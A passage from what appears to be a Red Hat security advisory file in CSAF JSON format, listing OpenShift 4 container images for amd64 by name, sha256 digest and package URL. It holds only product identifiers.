"purl": "pkg:oci/openshift/ose-multus-cni-microshift-rhel9@sha256%3Aa165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572688"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"product_id": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-networkpolicy-rhel9@sha256%3A29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572927"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64",
"product_id": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-networking-console-plugin-rhel9@sha256%3Aca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577127"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64",
"product_id": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-oauth-server-rhel9@sha256%3A7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605151"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"product": {
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"product_id": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/oc-mirror-plugin-rhel9@sha256%3A15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565249"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"product_id": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-docker-builder-rhel9@sha256%3A6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606800"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cli-rhel9@sha256%3A2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563791"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"product_id": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-console-rhel9@sha256%3Ab391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775630129"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"product_id": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-console-rhel9-operator@sha256%3A6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606311"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"product_id": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-deployer-rhel9@sha256%3A6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577046"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"product_id": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-haproxy-router-rhel9@sha256%3A596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577060"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
"product_id": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-hyperkube-rhel9@sha256%3Ab207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557435"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"product_id": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-keepalived-ipfailover-rhel9@sha256%3Abf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604322"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"product_id": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-pod-rhel9@sha256%3A49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572233"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"product_id": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-docker-registry-rhel9@sha256%3A802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605796"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"product_id": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-tests-rhel9@sha256%3A30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775578545"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64",
"product_id": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openshift-state-metrics-rhel9@sha256%3A8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604183"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cluster-api-controllers-rhel9@sha256%3Ad5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606714"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"product": {
"name": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"product_id": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/openstack-resource-controller-rhel9@sha256%3A784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606963"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64",
"product_id": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-lifecycle-manager-rhel9@sha256%3A920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604626"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64",
"product_id": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-registry-rhel9@sha256%3A233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565149"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-api-server-rhel9@sha256%3A2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606032"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-csr-approver-rhel9@sha256%3A12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572826"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-node-agent-rhel9@sha256%3Adbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606441"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-orchestrator-rhel9@sha256%3A69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572582"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-utils-rhel9@sha256%3A19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604573"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
"product_id": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-apiserver-network-proxy-rhel9@sha256%3A7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564822"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"product_id": "registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-aws-cloud-controller-manager-rhel9@sha256%3A8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557318"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"product_id": "registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-aws-cluster-api-controllers-rhel9@sha256%3A3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557600"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
"product_id": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-aws-ebs-csi-driver-rhel9@sha256%3Ad1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602036"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"product_id": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-aws-ebs-csi-driver-rhel9-operator@sha256%3Aef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602004"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"product_id": "registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-aws-pod-identity-webhook-rhel9@sha256%3A15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557257"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"product_id": "registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-cloud-controller-manager-rhel9@sha256%3A249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557692"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
"product_id": "registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-cloud-node-manager-rhel9@sha256%3A660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557468"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"product_id": "registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-cluster-api-controllers-rhel9@sha256%3A255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602036"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"product_id": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-disk-csi-driver-rhel9@sha256%3A1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602060"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
